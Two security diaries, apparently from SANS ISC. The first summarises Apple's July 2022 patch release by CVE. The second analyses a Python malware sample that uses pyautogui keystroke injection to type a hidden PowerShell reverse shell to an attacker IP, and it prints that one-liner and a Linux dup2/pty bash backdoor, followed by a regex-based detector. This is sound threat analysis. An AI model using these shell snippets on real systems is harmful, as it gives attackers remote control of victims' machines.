Apple Patches Everything Day

Published: 2022-07-20. Last Updated: 2022-07-20 18:37:20 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Apple today released its usual "surprise patch day" update for all of its operating systems. There may still be separate Safari updates, but for currently supported operating systems, the operating system upgrades should include the respective Safari/WebKit fixes.

Note that Apple does not "rank" vulnerabilities or provide CVSS scores (or many details at all). The rating below is our own simple rating.

None of the vulnerabilities appears to be actively exploited.

Affected platforms are listed per entry; the columns of the original table were Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS and watchOS.

CVE-2022-32832 [important] APFS
The issue was addressed with improved memory handling.
An app with root privileges may be able to execute arbitrary code with kernel privileges
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32788 [critical] AppleAVD
A buffer overflow was addressed with improved bounds checking.
A remote user may be able to cause kernel code execution
Affects: tvOS, iOS/iPadOS, watchOS

CVE-2022-32824 [important] AppleAVD
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
Affects: tvOS, iOS/iPadOS, watchOS

CVE-2022-32826 [important] AppleMobileFileIntegrity
An authorization issue was addressed with improved state management.
An app may be able to gain root privileges
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32845 [important] Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to break out of its sandbox
Affects: Monterey, iOS/iPadOS, watchOS

CVE-2022-32840 [important] Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges
Affects: Monterey, iOS/iPadOS, watchOS

CVE-2022-32810 [important] Apple Neural Engine
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
Affects: Monterey, iOS/iPadOS, watchOS

CVE-2022-32820 [important] Audio
An out-of-bounds write issue was addressed with improved input validation.
An app may be able to execute arbitrary code with kernel privileges
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32825 [important] Audio
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
Affects: Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32839 [critical] CoreText
The issue was addressed with improved bounds checks.
A remote user may cause an unexpected app termination or arbitrary code execution
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32819 [important] File System Events
A logic issue was addressed with improved state management.
An app may be able to gain root privileges
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32793 [important] GPU Drivers
Multiple out-of-bounds write issues were addressed with improved bounds checking.
An app may be able to disclose kernel memory
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32821 [important] GPU Drivers
A memory corruption issue was addressed with improved validation.
An app may be able to execute arbitrary code with kernel privileges
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32787 [critical] ICU
An out-of-bounds write issue was addressed with improved bounds checking.
Processing maliciously crafted web content may lead to arbitrary code execution
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32841 [important] ImageIO
The issue was addressed with improved memory handling.
Processing a maliciously crafted image may result in disclosure of process memory
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32813 [important] Kernel
The issue was addressed with improved memory handling.
An app with root privileges may be able to execute arbitrary code with kernel privileges
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32815 [important] Kernel
The issue was addressed with improved memory handling.
An app with root privileges may be able to execute arbitrary code with kernel privileges
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32817 [important] Kernel
An out-of-bounds read issue was addressed with improved bounds checking.
An app may be able to disclose kernel memory
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32844 [important] Kernel
A race condition was addressed with improved state handling.
An app with arbitrary kernel read and write capability may be able to bypass Pointer Authentication
Affects: tvOS, iOS/iPadOS, watchOS

CVE-2022-26981 [important] Liblouis
This issue was addressed with improved checks.
An app may cause unexpected app termination or arbitrary code execution
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32823 [important] libxml2
A memory initialization issue was addressed with improved memory handling.
An app may be able to leak sensitive user information
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32814 [important] Multi-Touch
A type confusion issue was addressed with improved state handling.
An app may be able to execute arbitrary code with kernel privileges
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32857 [important] Software Update
This issue was addressed by using HTTPS when sending information over the network.
A user in a privileged network position can track a user's activity
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

WebKit Bugzilla [critical] WebRTC
A memory corruption issue was addressed with improved state management.
Processing maliciously crafted web content may lead to arbitrary code execution
Affects: Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32847 [other] Wi-Fi
This issue was addressed with improved checks.
A remote user may be able to cause unexpected system termination or corrupt kernel memory
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS, watchOS

CVE-2022-32797 [other] AppleScript
This issue was addressed with improved checks.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
Affects: Catalina, Big Sur, Monterey

CVE-2022-32853 [other] AppleScript
An out-of-bounds read issue was addressed with improved input validation.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
Affects: Catalina, Big Sur, Monterey

CVE-2022-32851 [other] AppleScript
An out-of-bounds read issue was addressed with improved input validation.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
Affects: Catalina, Big Sur, Monterey

CVE-2022-32831 [other] AppleScript
An out-of-bounds read issue was addressed with improved bounds checking.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
Affects: Catalina, Big Sur, Monterey

CVE-2022-32805 [other] Calendar
The issue was addressed with improved handling of caches.
Affects: Catalina, Big Sur, Monterey

CVE-2022-32849 [other] iCloud Photo Library
An information disclosure issue was addressed by removing the vulnerable code.
Affects: Catalina, Big Sur, Monterey, tvOS, iOS/iPadOS

CVE-2022-32781 [other] FaceTime
This issue was addressed by enabling hardened runtime.
An app with root privileges may be able to access private information
Affects: Catalina, Big Sur

CVE-2022-32785 [other] ImageIO
A null pointer dereference was addressed with improved validation.
Processing an image may lead to a denial-of-service
Affects: Catalina, Big Sur, Monterey, iOS/iPadOS

CVE-2022-32812 [important] Intel Graphics Driver
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
Affects: Catalina, Big Sur, Monterey

CVE-2022-32811 [important] Intel Graphics Driver
A memory corruption vulnerability was addressed with improved locking.
An app may be able to execute arbitrary code with kernel privileges
Affects: Catalina, Big Sur, Monterey

CVE-2022-32786 [other] PackageKit

An app may be able to modify protected parts of the file system
Affects: Catalina, Big Sur, Monterey

CVE-2022-32800 [other] PackageKit
This issue was addressed with improved checks.
An app may be able to modify protected parts of the file system
Affects: Catalina, Big Sur, Monterey

CVE-2022-32838 [other] PluginKit
A logic issue was addressed with improved state management.
An app may be able to read arbitrary files
Affects: Catalina, Big Sur, Monterey, iOS/iPadOS

CVE-2022-32843 [other] PS Normalizer
An out-of-bounds write issue was addressed with improved bounds checking.
Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory
Affects: Catalina, Big Sur, Monterey

CVE-2022-32842 [important] SMB
An out-of-bounds read issue was addressed with improved input validation.
An app may be able to gain elevated privileges
Affects: Catalina, Monterey

CVE-2022-32799 [other] SMB
An out-of-bounds read issue was addressed with improved bounds checking.
A user in a privileged network position may be able to leak sensitive information
Affects: Catalina, Monterey

CVE-2022-32807 [other] Spindump
This issue was addressed with improved file handling.
An app may be able to overwrite arbitrary files
Affects: Catalina, Big Sur, Monterey

CVE-2022-26704 [important] Spotlight

An app may be able to gain elevated privileges
Affects: Catalina, Big Sur

CVE-2022-32834 [other] TCC
An access issue was addressed with improvements to the sandbox.
Affects: Catalina, Big Sur, Monterey

CVE-2021-4136 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2021-4166 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2021-4173 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2021-4187 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2021-4192 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2021-4193 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2021-46059 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2022-0128 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Catalina

CVE-2022-0156 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Big Sur

CVE-2022-0158 [other] Vim
Multiple issues were addressed by updating Vim.
Multiple issues in Vim
Affects: Big Sur

CVE-2022-32848 [other] Windows Server
A logic issue was addressed with improved checks.
An app may be able to capture a user's screen
Affects: Big Sur, Monterey

CVE-2022-32852 [other] AppleScript
An out-of-bounds read issue was addressed with improved input validation.
Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory
Affects: Monterey

CVE-2022-32789 [other] Automation
A logic issue was addressed with improved checks.
An app may be able to bypass Privacy preferences
Affects: Monterey

CVE-2022-32828 [important] CoreMedia
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
Affects: Monterey, tvOS, iOS/iPadOS

CVE-2022-32829 [important] Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges
Affects: Monterey, iOS/iPadOS

CVE-2022-32796 [important] SMB
A memory corruption issue was addressed with improved state management.
An app may be able to execute arbitrary code with kernel privileges
Affects: Monterey

CVE-2022-32798 [important] SMB
An out-of-bounds write issue was addressed with improved input validation.
An app may be able to gain elevated privileges
Affects: Monterey

CVE-2022-32818 [important] SMB
The issue was addressed with improved memory handling.
An app may be able to leak sensitive kernel state
Affects: Monterey

CVE-2022-32801 [important] Spotlight
This issue was addressed with improved checks.
An app may be able to gain root privileges
Affects: Monterey

CVE-2021-28544 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
Affects: Monterey

CVE-2022-24070 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
Affects: Monterey

CVE-2022-29046 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
Affects: Monterey

CVE-2022-29048 [other] subversion
Multiple issues were addressed by updating subversion.
Multiple issues in subversion
Affects: Monterey

CVE-2022-32837 [important] Wi-Fi
This issue was addressed with improved checks.
An app may be able to cause unexpected system termination or write kernel memory
Affects: Monterey, tvOS, iOS/iPadOS

CVE-2022-32802 [critical] ImageIO
A logic issue was addressed with improved checks.
Processing a maliciously crafted file may lead to arbitrary code execution
Affects: tvOS, iOS/iPadOS

CVE-2022-32830 [important] ImageIO
An out-of-bounds read issue was addressed with improved bounds checking.
Processing a maliciously crafted image may lead to disclosure of user information
Affects: tvOS, iOS/iPadOS

CVE-2022-32855 [important] Home
A logic issue was addressed with improved state management.
A user may be able to view restricted content from the lock screen
Affects: iOS/iPadOS

CVE-2022-26768 [important] IOMobileFrameBuffer
A memory corruption issue was addressed with improved state management.
An application may be able to execute arbitrary code with kernel privileges
Affects: iOS/iPadOS

CVE-2022-32784 [important] Safari Extensions
The issue was addressed with improved UI handling.
Visiting a maliciously crafted website may leak sensitive data
Affects: iOS/iPadOS

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

Malicious Python Script Behaving Like a Rubber Ducky

Published: 2022-07-20. Last Updated: 2022-07-20 13:36:18 UTC
by Xavier Mertens (Version: 1)

Last week I was at SANSFIRE in Washington, where I presented a SANS@Night talk about malicious Python scripts in Windows environments. I'm still looking for more fresh meat and, yesterday, I found another interesting one.

Do you remember the Rubber Ducky[1]? Pentesters like this kind of gadget. I still have one, as well as others with WiFi capabilities. The idea behind these USB keys is to deliver a payload by simulating a keyboard: when you connect them to a computer, they are detected as a HID ("Human Interface Device"), and the payload is "injected" as if the user had pressed all the keys one by one.

The script that I found provides the same behaviour! It was found on VT with a very low score of only 3/58[2] (SHA256: 83d009773ecfbc4016493f131ea07aa57408c9a6d334dd66cac5dac81a745241). The magic happens with the help of a specific Python library called pyautogui[3]. Its description says everything:

"PyAutoGUI lets your Python scripts control the mouse and keyboard to automate interactions with other applications. The API is designed to be simple. PyAutoGUI works on Windows, macOS, and Linux, and runs on Python 2 and 3."

How does it work? The script opens a "Run Command" window (by simulating a "Win+R" keypress), launches cmd.exe and types a PowerShell one-liner that opens a backdoor to a server controlled by the attacker:

import pyautogui
...
try:

    # open a terminal and connect to the console (original comment in Spanish: "abrir una terminal y conectar a la consola")
    command = """powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('20[.]127[.]79[.]213', 6665);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" """

    pyautogui.hotkey('win', 'r')
    pyautogui.typewrite('cmd')
    pyautogui.press('enter')
    pyautogui.typewrite(command)
    pyautogui.press('enter')
except:
    pass

Note the Spanish comment!

Once the backdoor is open, the script implements a keylogger.

Finally, the script is compatible with Linux systems too. In this case, it does not use pyautogui but simply implements a backdoor with bash:

if OS == 'Linux':
    self.socket.connect((self.host, self.port))
    os.dup2(self.socket.fileno(), 0)
    os.dup2(self.socket.fileno(), 1)
    os.dup2(self.socket.fileno(), 2)
    pty.spawn('/bin/bash')

The script remains basic and is not obfuscated, but it does the job!
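For a triage workflow, the two behaviours described above (pyautogui keystroke injection feeding a hidden PowerShell reverse shell, and the Linux dup2/pty.spawn backdoor) can be scored from the script's source. The following is an added example written for this diary, not code from the sample or from the ISC; the indicator names, weights and the two constructed test scripts (with a documentation-range placeholder address) are my own.

```python
import re

# Indicator regexes modelled on the behaviours the diary describes. The names,
# grouping and sample scripts are constructed for this example, not taken from the malware.
INDICATORS = {
    "pyautogui_import": re.compile(r"^\s*(?:import|from)\s+pyautogui\b", re.M),
    "win_r_hotkey": re.compile(r"pyautogui\.hotkey\(\s*['\"]win['\"]\s*,\s*['\"]r['\"]"),
    "typed_command": re.compile(r"pyautogui\.typewrite\("),
    "ps_hidden_bypass": re.compile(
        r"powershell\b[^\n]*?-(?:W|WindowStyle)\s+hidden[^\n]*?-(?:ep|ExecutionPolicy)\s+bypass", re.I),
    "ps_tcp_client": re.compile(r"Net\.Sockets\.TCPClient\(", re.I),
    "ps_iex": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "dup2_to_socket": re.compile(r"os\.dup2\(\s*\w+(?:\.\w+)*\.fileno\(\)\s*,\s*[012]\s*\)"),
    "pty_shell": re.compile(r"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh['\"]"),
}

# A technique fires only when its indicators co-occur: "required" must all be present
# and at least one of "any_of", so plain GUI automation or a lone pty import stays quiet.
TECHNIQUES = {
    "keystroke_injection": ({"pyautogui_import"}, {"win_r_hotkey", "typed_command"}),
    "powershell_reverse_shell": ({"ps_tcp_client"}, {"ps_hidden_bypass", "ps_iex"}),
    "linux_pty_reverse_shell": ({"dup2_to_socket"}, {"pty_shell"}),
}

def scan_source(source: str) -> dict:
    """Return the indicators matched in a Python source text and the techniques they add up to."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(source)}
    found = [t for t, (required, any_of) in TECHNIQUES.items()
             if required <= hits and hits & any_of]
    return {"indicators": sorted(hits), "techniques": found}

# Constructed stand-in for the diary's script (192.0.2.10 is a placeholder, not the real C2).
SUSPECT = '''import pyautogui, os, pty, socket
command = """powershell -nop -W hidden -noni -ep bypass -c "$c = New-Object Net.Sockets.TCPClient('192.0.2.10', 6665); Invoke-Expression $x" """
pyautogui.hotkey('win', 'r')
pyautogui.typewrite('cmd')
pyautogui.typewrite(command)
if OS == 'Linux':
    os.dup2(self.socket.fileno(), 0)
    pty.spawn('/bin/bash')
'''
# Constructed benign automation script: uses pyautogui but never types a command.
BENIGN = '''import pyautogui
pyautogui.moveTo(100, 100)
pyautogui.click()
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, scan_source(src))
```

The co-occurrence rule is what keeps false positives down: legitimate pyautogui automation matches one indicator, while the diary's sample lights up all three techniques.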

[1] https://shop.hak5.org/products/usb-rubber-ducky-deluxe
[2] https://www.virustotal.com/gui/file/83d009773ecfbc4016493f131ea07aa57408c9a6d334dd66cac5dac81a745241/content/preview
[3] https://pyautogui.readthedocs.io/en/latest/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant